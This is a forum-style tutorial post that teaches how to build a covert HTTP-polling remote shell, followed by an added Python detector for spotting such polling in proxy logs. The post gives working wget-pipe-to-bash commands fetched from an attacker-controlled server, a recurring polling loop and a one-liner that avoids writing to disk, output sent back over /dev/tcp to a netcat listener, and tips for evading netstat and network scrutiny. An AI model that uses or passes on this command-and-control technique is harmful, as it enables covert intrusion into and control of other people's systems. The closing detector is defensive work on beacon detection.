This is a little trick I picked up recently. Can't remember where I got it, but I'm going to show you how it works. Below is the bash command using wget. For those who don't know, wget is a file download utility preinstalled on most Unix-like systems.
Code:
wget -q -O - http://example.com | bash
So basically what's going on is wget downloads the page quietly (-q flag) and, because of "-O -", writes it to standard output instead of a file, so the output can be piped straight into bash. The commands on the web page are then executed. http://example.com would be an HTTP server you control. You could host a simple text file on it containing bash commands. For example, to make a "command page" for the shell all you have to do is (on Unix systems) enter: touch command.txt. Then put whatever command you want in the file. To list directory contents on the compromised system, run this on your system: echo "ls" > command.txt
So that's all well and good. But it only allows one command to be executed at a time. Let's make a little bash script.
Code:
for i in {1..9999}
do
wget -q -O - http://example.com | bash
sleep 60
done
Save it as a bash script (something.sh) and then execute it on the target. It just executes whatever is on the control web page every 60 seconds. We can shorten this to a one-liner if you would rather not write the script to the target's disk.
Code:
for i in {1..9999}; do wget -q -O - http://example.com | bash; sleep 60; done
You can't really see any of the output of your commands. The solution is to redirect output back to your machine. You'll need a netcat listener running on the port you redirect to (31337 in the example) to receive the output:
Code:
wget -q -O - http://127.0.0.1:8080/cmd | bash &> /dev/tcp/127.0.0.1/31337
This is better than your average TCP reverse shell, for two reasons. 1: HTTP(S) is less suspicious on a network than a raw TCP connection. And yes, if your site runs HTTPS then the shell communications will also be encrypted. 2: The connection only stays open as long as wget takes to fetch the page, which isn't long. The "sleep" time is obviously up to you, so it can connect back more or less often. So if you run netstat, you may or may not actually see it. If you do happen to catch it, it looks like an HTTP(S) connection. Under closer scrutiny on the network side, this shell will show a wget user agent; you can set your own with the wget -U flag.
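From the defender's side, the one thing the sleep loop above cannot hide is its timing: a host fetching the same URL every ~60 seconds stands out in proxy logs even after the user agent is changed with -U. The following Python detector is an added example, not part of the original post; the log line format and the sample lines are constructed assumptions, not real data.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample proxy log lines (hypothetical format:
# "<ISO timestamp> <client ip> <method> <url> <status> <user-agent>").
# 10.0.0.5 polls one URL about every 60 s; 10.0.0.7 browses irregularly.
SAMPLE_LOG = """\
2024-01-01T10:00:00 10.0.0.5 GET http://example.com/cmd 200 Wget/1.21.3
2024-01-01T10:00:12 10.0.0.7 GET http://news.example/ 200 Mozilla/5.0
2024-01-01T10:01:00 10.0.0.5 GET http://example.com/cmd 200 Wget/1.21.3
2024-01-01T10:02:01 10.0.0.5 GET http://example.com/cmd 200 Wget/1.21.3
2024-01-01T10:03:00 10.0.0.5 GET http://example.com/cmd 200 Wget/1.21.3
2024-01-01T10:03:40 10.0.0.7 GET http://news.example/story 200 Mozilla/5.0
2024-01-01T10:04:01 10.0.0.5 GET http://example.com/cmd 200 Wget/1.21.3
2024-01-01T10:09:00 10.0.0.7 GET http://news.example/ 200 Mozilla/5.0
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (.*)$")

def parse(log_text):
    """Yield (timestamp, client, url, user_agent) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(4), m.group(6)

def find_beacons(log_text, min_hits=4, max_jitter=0.1):
    """Return [(client, url, mean_gap_seconds, wget_ua)] for every (client, url)
    pair whose request spacing is nearly constant, i.e. a sleep-loop poller."""
    stamps = defaultdict(list)
    agents = defaultdict(set)
    for ts, client, url, ua in parse(log_text):
        stamps[(client, url)].append(ts)
        agents[(client, url)].add(ua)
    hits = []
    for key, times in stamps.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        # coefficient of variation: a fixed "sleep N" loop sits close to zero
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            # the User-Agent is only a bonus signal, since wget -U replaces it
            wget_ua = any(ua.startswith("Wget/") for ua in agents[key])
            hits.append((key[0], key[1], avg, wget_ua))
    return hits
```

Calling find_beacons(SAMPLE_LOG) returns a single hit, 10.0.0.5 polling http://example.com/cmd at a mean gap of 60.25 s, while the irregular browsing host is ignored; raise max_jitter if the loop you are hunting adds random sleep.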
That's all for today boys and girls. Hope you enjoyed and thanks for reading.
- ghost_eyes
https://github.com/ghostwalkr